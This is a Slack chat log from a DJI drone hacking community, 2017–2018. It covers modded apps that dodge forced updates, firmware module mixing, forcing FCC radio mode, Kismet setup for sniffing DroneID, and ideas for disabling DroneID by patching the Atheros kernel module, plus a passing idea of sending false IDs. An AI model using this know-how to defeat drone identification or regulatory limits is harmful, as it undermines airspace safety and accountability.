Messages in aeroscope-droneid
[2017-08-24 16:56:05]
nocommie :
set the channel description: A place to get short and concise info on progress/updates. No discussions please.
[2017-08-24 16:56:05]
nocommie :
@nocommie has joined the channel
[2017-08-24 17:00:17]
nocommie :
Confirmed on virgin android that the latest modded app (v28) does not get any popup about the Spark forced update when online. See discussion in APK Patching for additional info.
[2017-08-24 17:02:33]
andreasnofear :
@andreasnofear has joined the channel
[2017-08-24 17:02:51]
prelator :
@prelator has joined the channel
[2017-08-24 17:10:44]
tylkologin :
@tylkologin has joined the channel
[2017-08-24 17:14:08]
haloweenhamster :
@haloweenhamster has joined the channel
[2017-08-24 17:14:48]
torneo :
@torneo has joined the channel
[2017-08-24 17:34:45]
digital1 :
@digital1 has joined the channel
[2017-08-24 18:01:30]
mikeman :
@mikeman has joined the channel
[2017-08-24 20:35:01]
ender :
@ender has joined the channel
[2017-08-24 20:36:17]
ender :
Confirmed by kyokushin that my “switch off cache” patch in 28 reduces crashes GREATLY if not completely (he had no crash anymore so far, had crashes often before…)
[2017-08-24 23:07:36]
oqradze :
@oqradze has joined the channel
[2017-08-25 02:58:01]
goof :
@goof has joined the channel
[2017-08-25 12:46:07]
nocommie :
DJI has started to comply with the open source GPL <http://www.dji.com/opensource>
[2017-08-25 14:06:26]
exculpo :
@exculpo has joined the channel
[2017-08-25 15:55:26]
stayforward :
@stayforward has joined the channel
[2017-08-25 18:00:26]
nocommie :
There are currently several Mavic FW updates with the same exact FW number (1.3.1000). They have introduced the anti-rollback restriction in the latest just as in the 600 for Spark.
[2017-08-25 21:53:46]
prelator :
There are work arounds for the anti-rollback, correct?
[2017-08-27 08:04:34]
kilrah :
@kilrah has joined the channel
[2017-08-27 23:38:27]
ripko :
@ripko has joined the channel
[2017-08-28 02:53:23]
cubacan :
@cubacan has joined the channel
[2017-08-28 06:11:48]
kiteboy :
@kiteboy has joined the channel
[2017-08-29 00:41:03]
hotelzululima :
@hotelzululima has joined the channel
[2017-08-29 01:23:32]
sbpoole :
@sbpoole has joined the channel
[2017-08-30 08:02:21]
kyokushin :
@kyokushin has joined the channel
[2017-09-01 19:45:20]
nocommie :
Spark on FW 300 with latest modded app is not affected by the forced update attempt by DJI. Still able to fly on Sept 1st.
[2017-09-01 19:45:42]
kilrah :
it's "after sept 1"
[2017-09-01 19:46:09]
kilrah :
even original app still works today but you get a warning that tomorrow you're done
[2017-09-01 19:47:25]
kilrah :
let's see how far back app version will notify
[2017-09-01 19:51:45]
nocommie :
Yep. Just FYI, I am not even getting the pop-up on the modded app.
[2017-09-01 19:52:54]
kilrah :
ok, even 4.1.9 ios does not know about the spark grounding built-in, it comes from the net
[2017-09-01 19:53:19]
kyokushin :
[cancer.dji.com](http://cancer.dji.com) :joy:
[2017-09-01 20:32:36]
kilrah :
ok, every app version that supports spark (4.1.0 onwards) gets the message when online, but none know about it if fully offline
[2017-09-01 20:32:56]
kilrah :
the app doesn't download the info unless the aircraft has been connected
[2017-09-01 20:35:32]
kilrah :
but once it has downloaded the info it keeps it in cache (available versions)
[2017-09-01 20:37:22]
kilrah :
the "update required" is not cached though, so you won't get it if you're offline
[2017-09-01 20:39:03]
kilrah :
strangely enough it offers me updates to 500, not 600
[2017-10-09 15:24:37]
nocommie :
See the following to get the latest Spark fixes without giving control of your property back to the communists. I was on 300 on the spark and just flashed 600 with everything except the flight controller. Just tested and for the first time my quickshots worked perfectly. I also tested RTH both from the RC and app and it worked perfectly. I have not tested NFZ yet but all the parameters I modded in the assistant2 are still as they were before. Follow the how-to in the wiki from @joker_x3 <http://dji.retroroms.info/howto/modulemix>
[2017-10-14 19:24:29]
nocommie :
Just to add, I have also confirmed video gesture mode works after using this procedure.
[2017-10-15 00:05:26]
coldflake :
@nocommie can you send me the fw so that we can make it available in nld?
[2017-10-15 00:06:17]
coldflake :
I could of course do it myself but why waste time I could use RE something else? ;)
[2017-10-15 00:06:59]
coldflake :
...you will be mentioned in the scroll text for the contribution :)
[2017-10-15 00:29:04]
nocommie :
Sending you a PM
[2017-10-15 07:18:45]
joker_x3 :
@coldflake @nocommie these are the .600 modules which have to be upgraded after being on .300 Spark firmware. It is a ready to flash package, feel free to use :) <https://drive.google.com/file/d/0B-5colMs7hnYa294SWVBVVY5X0E/view?usp=sharing>
[2017-10-16 07:54:18]
carlcox89 :
Nothing for Mavic guys?
[2017-10-16 13:46:44]
joker_x3 :
@carlcox89 you could build your own package if you want to try. There is a wiki entry. I don’t own a Mavic, though, so I never played with mixing modules on that.
[2017-10-16 16:03:45]
nocommie :
As far as I know there are no big updates to get by updating certain modules in the Mavic above FW 700. The new features such as spark flight modes on the Mavic require an app update.
[2017-10-16 18:19:46]
carlcox89 :
I only wanted quickshots while staying on 700 firmware
[2017-10-16 18:53:07]
nocommie :
From what I understand you have to update the FW and have the app where it was introduced, 4.1.8 maybe?
[2017-10-16 19:17:06]
haloweenhamster :
4.1.10 but thankfully @bin4ry added it to older versions for android and it requires fw 1.3.1000 or 1.4.0000
[2017-10-16 20:03:26]
carlcox89 :
Yup but if one could mix 700 flight controller with other 1000 modules like you guys did with Spark..that would be awesome
[2017-10-16 20:08:55]
joker_x3 :
@carlcox89 why don’t you try yourself? Have you read the wiki entry?
[2017-10-16 20:10:48]
carlcox89 :
If I remember correctly, kilrah said there were issues when doing that with mavic
[2017-10-16 20:11:21]
carlcox89 :
And currently I just have my job's Mavic..mine went for dji refresh
[2017-10-16 20:32:45]
kilrah :
Tried 700 and 900 and was no good. No interest in the newer FWs so I won't waste time on those.
[2017-10-17 16:50:41]
nocommie :
Per @ender You do not need the (missing) Login patch for 4.1.9 if you install a “login patched” 4.1.3 before and login once, THEN upgrade to the 4.1.9.
[2017-11-26 21:42:37]
nocommie :
Mysterious version 4.1.14 verified working with mixed modules. All features work on Mavic (quickshots etc). However, you cannot have this version installed along with any DJI Go3 version later than 3.1.10. Whichever is installed last will fail. For some reason this is not an issue if you use the latest official DJIGo4 and DJIGo3 from the app store.
[2017-11-26 21:53:35]
czokie :
@nocommie - Suggest putting this info in !wiki
[2017-11-26 21:53:52]
nocommie :
Already did :wink:
[2017-11-26 21:53:56]
czokie :
:slightly_smiling_face:
[2017-11-26 21:54:15]
nocommie :
under the version number of the app
[2017-11-28 22:20:02]
nocommie :
At least some Mavics are now shipping with no SD card and FW that writes to onboard flash instead of the SD card. So when you downgrade to an older FW, the older FW is looking for the SD card which causes errors. For now the work around is to install your own sd card. However it is unknown if this means future Mavics will ship without an SD slot at all.
[2018-01-02 19:03:43]
nocommie :
@nocommie has renamed the channel from "updates" to "aeroscope-droneid"
[2018-01-02 19:05:34]
nocommie :
Just to recap, there is ongoing work with droneid on kismet to address some issues with drones not showing up.
[2018-01-02 22:51:06]
hdizzle :
Hmmmm I have the options to turn off uuid and purpose for my spark. I did not know it was transmitting my home coords; that is concerning me.
[2018-01-02 22:54:30]
kyokushin :
what version of app?
[2018-01-02 22:56:47]
hdizzle :
4.1.20 iOS
[2018-01-02 22:58:39]
hdizzle :
I used patched APK 4.1.14 on a spare Android phone to force FCC mode and it does prompt me with the warning that I cancel each flight however people are saying the latest app forces CE when home point is updated now so not sure if I’m getting FCC. Apart from that I’m on stock .900 firmware for my Spark.
[2018-01-02 23:07:08]
nocommie :
Just an FYI that @hostile and the author of kismet/droneid are currently testing some things to see why some of us can't detect our drones. I would say wait until that is fixed before getting too much in the weeds with this. Once that is fixed, we can easily see what is being transmitted etc on what FW versions.
[2018-01-02 23:11:33]
hdizzle :
Yep watching keenly. I’m happy if it’s not sending anything :)
[2018-01-03 00:08:04]
hostile :
updates soon hopefully
[2018-01-03 00:15:00]
hostile :
anyone using kismet having the issue: it would be useful if you could download the pcap from Kismet and get it my way so we can examine the packet captures.
[2018-01-03 00:16:09]
nocommie :
would that still be leftover from my previous run a few hours ago or do I need to fire it up again?
[2018-01-03 00:19:05]
hostile :
<https://twitter.com/kismetwireless/status/948347208730103813>
[2018-01-03 00:19:24]
hostile :
@nocommie you’d need to run it again
[2018-01-03 00:19:32]
hostile :
the pcap is **live** IIRC
[2018-01-03 00:20:27]
nocommie :
with a drone running?
[2018-01-03 00:20:57]
hostile :
well yeah.
[2018-01-03 00:21:02]
hostile :
i mean it captures live…
[2018-01-03 00:21:02]
nocommie :
ok lol
[2018-01-03 00:21:14]
hostile :
so if the drone isn’t on…. props started… GPS, etc… droneID won’t be capturable =]
[2018-01-03 00:21:50]
nocommie :
ok, I will see if one still exists from earlier, if not, I will run a session
[2018-01-03 00:22:05]
hostile :
<http://blog.kismetwireless.net/2017/05/pcap-over-http-and-other-fun.html>
[2018-01-03 00:22:20]
hostile :
<http://kismet:kismet@localhost:2501/data/all_packets.pcapng> is the address of your pcaps… **always**
[2018-01-03 18:01:18]
hostile :
those of you <!here> with issues…. what drones are you having problems with Mavic or Spark?
[2018-01-03 18:15:31]
nocommie :
I tried both.
[2018-01-03 18:22:00]
hostile :
send me a pcap please
[2018-01-03 18:22:10]
hostile :
I just tested $latest spark is fine (sans RC)
[2018-01-03 18:22:26]
hostile :
Mavic seems to have been broken in recent release by DJI
[2018-01-03 18:27:48]
nocommie :
I tried getting a pcap log and failed miserably. Looked at the link you sent and tried by using the download in the front end and couldn't get it to cooperate. I am just not up to speed enough on CLI with kismet unfortunately.
[2018-01-03 18:28:17]
hostile :
kismet CLI is not what you use
[2018-01-03 18:28:23]
hostile :
once kismet starts you use the user interface
[2018-01-03 18:28:31]
hostile :
top left corner click… scroll down to download pcap
[2018-01-03 18:28:45]
hostile :
you are using $latest kismet compiled from git, right?
[2018-01-03 18:30:31]
nocommie :
Yep, recompiled late yesterday. Yep, used the interface, bottom option. Asks for login and I entered the info on the conf file. Login just goes away and a blank web page.
[2018-01-03 18:31:04]
nocommie :
booting my linux box now to double check
[2018-01-03 18:31:24]
nocommie :
FYI, I only tested the Spark with RC, not wifi
[2018-01-03 18:32:29]
hostile :
k
[2018-01-03 18:32:40]
hostile :
what browser
[2018-01-03 18:32:47]
hostile :
sounds like your browser has no javascript
[2018-01-03 18:32:55]
hostile :
WITH RC it will never work
[2018-01-03 18:33:24]
nocommie :
Firefox included with kali. yeah, I found that out later. Just wanted to make sure you knew I wasn't having issues with spark and wifi
[2018-01-04 02:38:11]
hdizzle :
I can use Wireshark instead of Kismet yah?
[2018-01-04 02:39:51]
hdizzle :
@nocommie what you mean by it’s fine? is it transmitting my home coords?
[2018-01-04 02:41:21]
nocommie :
I don't have any idea if wireshark had droneid implemented in it. I don't know what you mean by what I mean its fine. lol
[2018-01-04 03:43:27]
hdizzle :
I think you said no droneid stuff was being transmitted with Mavic on latest firmware but it is on spark, is that what you mean by fine?
[2018-01-04 03:46:51]
hostile :
no, Mavic is transmitting nulled out packets on $Latest
[2018-01-04 03:46:59]
hostile :
spark with RC connected transmits none
[2018-01-04 03:47:17]
hostile :
@nocommie droneid is a vendor IE tag…
[2018-01-04 03:47:19]
hostile :
nothing special
[2018-01-04 03:47:32]
hostile :
you can’t decode the tag as droneid
[2018-01-04 03:47:37]
hostile :
(using wireshark)
[2018-01-04 03:47:45]
hostile :
but you can at least see it is there
[2018-01-04 03:50:52]
hdizzle :
Yea I meant to see it, figured it probably wouldn’t decode it yet. Ah ok gotcha. Ok good I’m glad it’s not transmitting when connected to RC.
[2018-01-04 10:53:08]
codeforge :
droneID will be discoverable even using RC? or will be available just for wifi AC?
[2018-01-04 13:54:24]
mathieu.peyrega :
small kismet question... how do you "stop the downloading pcap-ng to actually get the file?" God, so much entertaining stuff in here... i feel like a viiiirg... sorry like a child at Toys'R'Us :slightly_smiling_face:
[2018-01-04 13:55:21]
mathieu.peyrega :
by the way, I've been compiling it on an odroid-xu4 and it's working very well (using an ALFA AWUS052NH wireless adapter)
[2018-01-04 14:57:12]
hostile :
@mathieu.peyrega what OS are you on? just interrupt the transfer
[2018-01-04 14:57:35]
hostile :
kismet is great for embedded devices
[2018-01-04 14:57:40]
hostile :
I have it running on RasPi zero
[2018-01-04 15:03:35]
hostile :
on the browser side re: OS question btw
[2018-01-04 15:04:03]
mathieu.peyrega :
ubuntu mate 16.04, using chromium browser. when I press the download pcap-ng button from the web interface, it starts downloading a file, but then I only have the option to pause or cancel the transfer (cancel erases the file, pause just stops downloading. There is this crdownload file in the download directory that I can make a copy of)
[2018-01-04 15:04:26]
mathieu.peyrega :
maybe i'm just blind but I don't see a stop transfer button on kismet web interface
[2018-01-04 15:25:27]
hostile :
that is what I have to do on mac
[2018-01-04 15:25:32]
hostile :
wget on command line is easier
[2018-01-04 15:25:37]
hostile :
to the same address
[2018-01-04 15:25:47]
hostile :
then ctrl-c stops it and keeps the remaining
[2018-01-04 15:27:10]
mathieu.peyrega :
ok, so was not me :slightly_smiling_face:
[2018-01-04 15:27:13]
mathieu.peyrega :
thanks
[2018-01-04 15:33:49]
nocommie :
@hostile still trying to get my log for you as well. Seems java is the issue with FF. Installed Chrome and it wont even launch :confused:
[2018-01-04 15:34:13]
hostile :
thanks!
[2018-01-07 15:43:10]
cubacan :
installing various receivers you could make droneflight24)
[2018-01-08 15:49:31]
hostile :
@cubacan you are 100% right...
[2018-01-08 15:50:00]
hostile :
DJI does not see that as a probable threat... they told me I was insane to think anyone would run a distributed community based DroneID detection system
[2018-01-08 20:10:10]
czokie :
Should we register the domain just for laughs?
[2018-01-08 20:11:09]
czokie :
build something that will be a data collector - stick it in tables - and provide XML back - which could be consumed by FlightRadar24 - on the condition they provide maps back under license (Save writing code)
[2018-01-08 20:24:54]
cubacan :
[www.droneradar24.com](http://www.droneradar24.com) is busy ))
[2018-01-08 20:33:17]
hostile :
[DroneIDradar24.com](http://DroneIDradar24.com) =]
[2018-01-08 20:33:26]
hostile :
[RemoteDroneIdentification.com](http://RemoteDroneIdentification.com)
[2018-01-08 20:33:41]
hostile :
[RemoteDroneID24.com](http://RemoteDroneID24.com)
[2018-01-08 21:52:27]
hostile :
does ANY Android User have Drone ID optional settings in their app? <https://www.dji.com/newsroom/news/dji-introduces-voluntary-flight-identification-options-for-drone-pilots>
[2018-01-08 21:52:37]
hostile :
@channel --^
[2018-01-08 22:00:34]
haloweenhamster :
I haven't in the UK
[2018-01-08 22:03:20]
vo :
I do not have
[2018-01-08 22:03:39]
hostile :
thanks fellas
[2018-01-08 22:04:00]
hostile :
I'm working to confirm DroneID packet corruption on Mavic $current firmware also
[2018-01-08 22:04:20]
hostile :
My initial tests, and the Kismet code, were based on V1.03.0900
[2018-01-08 22:04:44]
hostile :
I'm installing V1.03.1000 now for my next round of testing
[2018-01-09 00:34:21]
nocommie :
Should anything less than 1.4.0100 work correctly?
[2018-01-09 00:35:02]
nocommie :
FYI am on mixed mod 700 and 4.0000
[2018-01-09 00:35:11]
nocommie :
and had issues.
[2018-01-09 00:36:21]
hdizzle :
Isn’t it good that it's not sending packets?
[2018-01-09 00:36:22]
hostile :
Kismet will be updated to detect the malformed Mavic packets on $current
[2018-01-09 00:36:36]
hdizzle :
Why do we want the government to track us?
[2018-01-09 00:36:42]
hostile :
nothing below 01.03.0900 has droneid
[2018-01-09 00:36:54]
hostile :
who said anything about the government Sparky?
[2018-01-09 00:37:01]
hdizzle :
“authorities”
[2018-01-09 00:37:09]
hostile :
who said anything about authorities?
[2018-01-09 00:37:15]
hostile :
any idiot can track you
[2018-01-09 00:37:17]
hdizzle :
in the article you posted
[2018-01-09 00:37:28]
hostile :
ANY idiot…
[2018-01-09 00:37:32]
hostile :
not just the above
[2018-01-09 00:37:50]
hdizzle :
dji say the authorities can track our drones. Yes i know anyone who can sniff wifi packets. Terrible.
[2018-01-09 00:37:56]
hostile :
I work for a counter drone company… so “authorized” authorities are fine..
[2018-01-09 00:38:08]
hostile :
they put forth a concept of only authorities…
[2018-01-09 00:38:10]
hostile :
it is fallacy
[2018-01-09 00:38:14]
hostile :
ANY idiot can track droneid
[2018-01-09 00:38:31]
hostile :
so their whole concept of “authorized receivers” is garbage
[2018-01-09 00:38:54]
hdizzle :
If that were the case they would need to encrypt the data and supply authorities with the key
[2018-01-09 00:38:59]
hostile :
correct
[2018-01-09 00:39:11]
hostile :
that is exactly why I helped create the patches for kismet
[2018-01-09 00:39:22]
hostile :
to highlight their technical flaws in logic
[2018-01-09 00:39:25]
hostile :
and claims
[2018-01-09 00:41:21]
hdizzle :
yea the chinese always do this kind of thing
[2018-01-09 00:41:37]
hdizzle :
I think over there, there is no culture of privacy
[2018-01-09 00:41:40]
hostile :
for me I also have some problem with the fact it was on since July…
[2018-01-09 00:41:45]
hostile :
they acted like they JUST turned it on
[2018-01-09 00:41:59]
hostile :
previously it was NOT optional in any way… and NOW only if you are on Android
[2018-01-09 00:42:17]
hdizzle :
it’s still not optional, only the extra info is optional
[2018-01-09 00:42:30]
hostile :
“Recent updates to the DJI GO 4 app and DJI drone firmware, made available first for the DJI Mavic Pro last week, will allow pilots to choose whether or not to broadcast additional information about their flight operations” <https://www.dji.com/newsroom/news/dji-introduces-voluntary-flight-identification-options-for-drone-pilots>
[2018-01-09 00:42:40]
hostile :
“last week”!?
[2018-01-09 00:42:44]
hostile :
lying fuckers
[2018-01-09 00:42:54]
hostile :
how about last August
[2018-01-09 00:43:24]
hdizzle :
Yea they are allowing you to optionally broadcast a uuid for your dji user account and flight purpose. The drone heading, speed etc is all still broadcast no matter what no option which upsets me.
[2018-01-09 00:43:31]
hostile :
they make it read as if they JUST added this feature to do the optional broadcast.
[2018-01-09 00:43:42]
hostile :
instead of saying it has been on mandatory, and NOW you can disable bits of it .=]
[2018-01-09 00:43:45]
hostile :
classic word smithing
[2018-01-09 00:44:44]
hdizzle :
Yea, be good to be able to send out false info haha
[2018-01-09 00:44:54]
hdizzle :
different serial no. etc
[2018-01-09 00:49:28]
nocommie :
The whole point of getting droneid working is so that we can accurately see what is being broadcast. personally i want to be able to see it so I can verify what I do to counter it actually works. Oh, and I want to wardrone :slightly_smiling_face:
[2018-01-09 00:50:51]
hdizzle :
The best way to counter it is to disable it.
[2018-01-09 00:52:03]
hdizzle :
if you reaaaaaaly want to leave it on and see what it sends, encrypt the data with a key that you control
[2018-01-09 00:52:23]
hdizzle :
that way you maintain your privacy while broadcasting it.
[2018-01-09 08:22:19]
wesleymiller :
idk how i feel about droneid
[2018-01-09 08:22:47]
wesleymiller :
i think so many people are at risk for abusing this tech that we need it. you can't fix stupid but you can reroute airplanes as a control tower operator.
[2018-01-09 14:20:12]
hostile :
confirmed here latest Mavic is sending out Null droneID packets...
[2018-01-09 14:22:38]
hostile :
@hdizzle <https://dji-rev.slack.com/archives/C6T95M0N6/p1515458684000328> I have enabled this already...
[2018-01-09 14:22:44]
hostile :
see here @hdizzle <https://github.com/rapid7/metasploit-framework/pull/9301>
[2018-01-09 14:54:06]
nocommie :
@hostile Do you think they broke droneid by accident or do you think they intentionally disabled it?
[2018-01-09 15:03:57]
hostile :
of course by accident
[2018-01-09 15:04:08]
hostile :
these jokers truncated a packet previously
[2018-01-09 15:05:56]
arrvodesign :
@hostile is this just the Drone ID packet or the entire Home Point, Height, Speed, etc as well?
[2018-01-09 15:06:26]
hostile :
the packets are fucked period
[2018-01-09 15:06:54]
arrvodesign :
got it, thanks
[2018-01-09 15:07:11]
fallengod :
Or it is just their form of encryption
[2018-01-11 17:21:18]
hostile :
lol no
[2018-01-11 17:21:23]
hostile :
the fucking packets are nulled out
[2018-01-11 17:22:02]
hostile :
@fallengod how you gonna decrypt a string fulla zeros hommie?
[2018-01-11 18:08:04]
hostile :
confirmed broken on latest
[2018-01-13 00:41:00]
arrvodesign :
@hostile does DroneID and Flight Purpose cover all the flight metrics like ID and flight details (height, home point etc)? would applying the FlightController patch be enough or are additional patches through fc_monitor to dji_network required to get all of the packets cleared?
[2018-01-13 00:46:24]
arrvodesign :
Judging from the doc, additional info is not covered with the patch and transmitted through FlightRegInfo
[2018-01-13 00:50:11]
hostile :
those two fields are free form text fields you edit via dji go app
[2018-01-13 00:50:28]
hostile :
patch would only need to be the Atheros kernel module
[2018-01-13 00:50:38]
hostile :
or the Occusync arm modem firmware
[2018-01-13 01:34:07]
arrvodesign :
@hostile is there an easier way? for example editing init.rc? property:dji.network_service=1
start dji_network
[2018-01-13 01:35:03]
arrvodesign :
there is also a service for dji_monitor
[2018-01-13 01:51:41]
arrvodesign :
# Load Atheros Driver
insmod $MOD_DIR/compat.ko
insmod $MOD_DIR/cfg80211.ko
insmod $MOD_DIR/ath6kl_usb.ko
[2018-01-13 02:04:17]
hostile :
ath6kl_usb.ko is where the packets are sent out...
[2018-01-13 02:04:21]
hostile :
it is in the kernel module
[2018-01-13 02:05:43]
arrvodesign :
system > lib > modules > ath6k > ath6kl_usb.ko
[2018-01-13 02:10:01]
hostile :
yes... that one
[2018-01-13 02:10:09]
hostile :
it writes to a file named dji_ie
[2018-01-13 02:10:15]
hostile :
with the contents to go out in the packet
[2018-01-13 02:10:25]
hostile :
someone needs to try to chattr -i the file too
[2018-01-13 02:10:27]
hostile :
as a test
[2018-01-13 02:13:54]
arrvodesign :
@hostile the file is quite large … what is recommended / safe way to approach it?
[2018-01-13 02:21:29]
arrvodesign :
Looks like athsoftap.sh also sets country code from default CN:
if [ “$OLD_COUNTRY_CODE” != “$DEF_COUNTRY_CODE” ]
then…
[2018-01-13 03:12:43]
hostile :
@arrvodesign IDA pro?
[2018-01-13 13:27:22]
arrvodesign :
@hostile you can open it as ELF for ARM or as Binary
[2018-01-13 14:49:11]
hostile :
Elf for arm
[2018-01-13 15:26:21]
arrvodesign :
thanks @hostile it works … seems like the process is: decompile and find the line of interest through IDA and then edit that line with HEX editor as IDA cannot really compile Kernel files or at least I didn’t find a way ))
[2018-01-13 15:27:01]
louisgat :
DJI Spark TSS FCC
[2018-01-13 16:01:31]
hostile :
@arrvodesign you can patch the binary in IDA.. <https://marcoramilli.blogspot.com/2011/01/how-to-patch-binary-with-ida-pro.html>
[2018-01-13 16:01:56]
hostile :
alternately... you could just recompile the atheros kernel module
[2018-01-13 16:01:57]
hostile :
=]
[2018-01-13 16:02:05]
hostile :
sans modifications
[2018-01-14 23:58:52]
arrvodesign :
As per doc, 700 and 800 have the same MD5 as earlier versions, which means no DroneID … so it starts from 900 after 2017-06-01
[2018-01-15 00:16:49]
arrvodesign :
@hostile are you sure the metrics are sent within older FW? couldn’t find anything related to reg_info packet …
[2018-01-15 00:57:07]
hostile :
@arrvodesign I am 100% sure DroneID started with .900 and after
[2018-01-15 19:00:54]
wesleymiller :
ID doesn't transmit until the motors start?
[2018-01-15 19:07:23]
arrvodesign :
@wesleymiller that's correct only for FW with drone id 900+
[2018-01-23 21:43:36]
hostile :
Latest Kismet has fixes to detect the broken mavic case.
[2018-01-23 21:44:14]
hostile :
<https://github.com/kismetwireless/kismet/commit/88dba31311c2397ef043f338fe37a3893b8ed15d>
[2018-01-23 21:50:19]
nocommie :
Cool. I will be testing it soon!
[2018-01-29 22:25:09]
hostile :
We've just added some patches that allow you to pick up the AdHoc networks that DJI uses on Spark RC (and Mavic Air) <https://github.com/kismetwireless/kismet>
[2018-01-29 22:25:18]
hostile :
your kernel may need support to tune to those channels..
[2018-01-31 00:31:59]
nocommie :
<https://www.suasnews.com/2018/01/dji-bridging-gap-civilians-uas-aeroscope/>
[2018-01-31 20:21:19]
hostile :
this is the latest Kismet detecting my MavicAir...
[2018-01-31 20:28:34]
djislack :
Holy fuck that is awesome
[2018-01-31 20:28:47]
djislack :
Time for some warbalooning
[2018-02-01 06:04:22]
hostile :
<https://twitter.com/d0tslash/status/958943719025266688>
[2018-04-01 16:58:48]
codeforge :
hi and happy easter to all :slightly_smiling_face: playing with kismet i can't detect mavic-air signal with current kismet scanning. Will it be possible in the future to detect it? Or can kismet detect just spark and mavic in wifi mode?
[2018-04-01 18:28:32]
validat0r :
@codeforge have you switched your wifi card to 5kHz mode?
[2018-04-01 18:29:47]
codeforge :
mmm no... i set it in monitor mode
[2018-04-01 18:30:19]
codeforge :
i will try to set it in 5kHz mode, thanks :)
[2018-04-01 18:31:09]
validat0r :
for me it was also worth trying 2,4GHz since I didn't receive droneid with 5GHz
[2018-04-01 18:32:05]
codeforge :
i set mavic-air wifi to 2.4Ghz but kismet cannot see it. I think i will buy an sdr hw
[2018-04-01 18:32:44]
validat0r :
5kHz should do the trick. i have an ancient atheros ath5k card, and it's visible
[2018-04-01 18:33:48]
validat0r :
the packets are crippled with my spark. MA should be interesting
[2018-04-01 18:34:51]
codeforge :
thanks i will try that
[2018-04-01 19:08:39]
kilrah :
only a few chipsets support the 5M bandwidth, need very specific cards
[2018-04-01 19:10:40]
codeforge :
could you suggest one?
[2018-04-01 19:16:05]
validat0r :
@hostile had one he recommended to me, but bloody slack hid the conversation.
[2018-04-01 19:16:25]
codeforge :
all my cards cannot work at 5ghz, i'm buying an AWUS051NH v2
[2018-04-01 19:16:57]
validat0r :
i think he said something about PCI express and ath10k compatible
[2018-04-01 19:18:04]
validat0r :
he suggested there's no usb dongle with good 5GHz/5MHz capabilities
[2018-04-01 19:19:27]
validat0r :
@codeforge you should check if the ALFA has ath10k compatible chipset
[2018-04-01 19:20:22]
validat0r :
I have an Alfa with older chipset (no 5GHz) but looks the same and I wasn't able to read any droneid stuff with it
[2018-04-01 19:23:35]
codeforge :
mmm... ok thanks for the info... i will search online for that card
[2018-04-01 19:24:15]
validat0r :
source=wlan10k0:add_channels="149W5,153W5,157W5,161W5,165W5,151W5,155W5,159W5,163W5,153W5,1W5,2W5,3W5,4W5,5W5,6W5,7W5,8W5,9W5,10W5,11W5,12W5,13W5,14W5"
[2018-04-01 19:24:59]
validat0r :
this is the /usr/local/etc/kismet_site.conf entry i used .. "wlan10k0" is to be adjusted to your system
[2018-04-01 19:28:35]
validat0r :
@codeforge it's not ath10k but ath5k or ath9k compatibility .. just checked my notes
[2018-04-01 19:36:01]
codeforge :
ok, great :+1:
[2018-04-02 04:21:56]
hostile :
Yeah no known usb at this time
[2018-04-02 04:22:16]
hostile :
Must be atk9k pci or m.2
[2018-04-02 04:22:44]
hostile :
I’ve got some ath6k from China I’m testing
[2018-04-02 04:22:52]
hostile :
Ath5k cardbus works also
[2018-04-05 16:38:56]
mathieu.peyrega :
I have to recheck, but I guess I tried with "ALFA Network awus052nh" usb adapter and it was working...
[2018-04-05 17:22:16]
hostile :
yeh?
[2018-04-05 17:22:19]
hostile :
which driver?
[2018-04-05 17:22:47]
hostile :
your kismet_site.conf has added 5W channels for this card also?
[2018-04-06 09:13:21]
mathieu.peyrega :
I just rechecked and yes, it seems to be working. Not sure it got all 5G channels but right now the ui is showing activity on channel 48
[2018-04-06 09:14:08]
mathieu.peyrega :
i'm using ubuntu mate 16.04, no special tuning, out of box auto driver selection
[2018-04-06 09:14:34]
validat0r :
so did you catch any AC ad-hoc packets?
[2018-04-06 09:15:13]
mathieu.peyrega :
not tried specifically with drone packets if that was the initial question (hope this is not a big misunderstanding)
[2018-04-06 09:15:36]
mathieu.peyrega :
but the adapter is seeing regular WiFi traffic
[2018-04-06 09:17:32]
validat0r :
a confirmation that kismet detected droneids (on 5GHz) with this card would be nice
[2018-04-06 09:18:55]
mathieu.peyrega :
i'll check that...
[2018-04-06 09:19:19]
validat0r :
:+1:
[2018-04-06 09:19:51]
mathieu.peyrega :
should work with Spark or only MAvic ?
[2018-04-06 09:24:58]
validat0r :
hm .. to my knowledge spark and mavic work similar, with the exception that spark produces crippled packets ...
[2018-04-06 09:26:40]
validat0r :
@codeforge was initially interested .. so maybe he could chime in here
[2018-04-06 09:50:14]
codeforge :
hi, yes i'm trying to use kismet to detect packet. I'm waiting to receive the pcie card to see if i can detect droneid with spark and mavic. With spark now i can see just the serial number when setting spark without rc in wifi mode in 2.4ghz...
[2018-04-06 09:57:44]
mathieu.peyrega :
seeing Spark-RC AP and one Wifi adhoc with "AtherosC" type when switching Spark to 2.4 GHz band. Seems not to be working on 5G band, but this may be some config and regdom issue on the PC itself (seeing messages from kismet about this)
[2018-04-06 09:59:55]
validat0r :
@ilovemynexus4 shared a file: [kismet](https://dji-rev.slack.com/files/U8X0X24F8/F9UUVBWNB/image.png)
[2018-04-06 10:00:15]
validat0r :
this was my output when putting my spark in 2,4Ghz mode
[2018-04-06 10:00:40]
validat0r :
coloring must be activated in kismet menu for detected drones/uavs
[2018-04-06 11:11:47]
kilrah :
did you do the kismet config command to add the 5MHz channels? you see if it complains that they're not supported
[2018-04-06 13:06:08]
mathieu.peyrega :
strangely, i'm getting a few adhoc devices, but none involving Spark or Spark-RC. Not getting anything with respect to Mavic Pro Platinum either (motors off in both cases...)
[2018-04-06 13:13:15]
hostile :
@ilovemynexus4 so it looks like you can at least tune to 5mhz channels on 2.4ghz...
[2018-04-06 13:13:49]
hostile :
you can see the 62:60:1f adhoc AP, which is good.
[2018-04-06 13:47:32]
validat0r :
@kilrah yes, @hostile was so nice as to provide me with the kismet_site.conf line ... not sure if ch149 is supported. it's listed and not removed, but i don't see any packets
[2018-04-06 13:48:12]
kilrah :
you see in the console output of the server if it's rejected
[2018-04-06 13:48:28]
kilrah :
it will show in the web interface no matter how so you've got to check that
[2018-04-06 13:48:39]
validat0r :
@mathieu.peyrega droneid is generated only after motors have started, not before.
[2018-04-06 13:49:04]
validat0r :
but packets are visible before, of course
[2018-04-06 13:49:53]
validat0r :
@kilrah it was my understanding, that kismet removes the channels which are not working on its own after they haven't worked for a couple of tries
[2018-04-06 13:50:14]
validat0r :
but that may be not very reliable
[2018-04-06 13:51:04]
validat0r :
anyway, i did my research into droneid a couple of weeks ago. i know how to switch it off, so i don't care that much any more
[2018-04-06 13:58:49]
hostile :
@ilovemynexus4 which card is it again? I will look up the chipset and see if there are any hints on why it may do 5mhz at 2.4ghz, but not on 5.8ghz
[2018-04-06 17:58:04]
hostile :
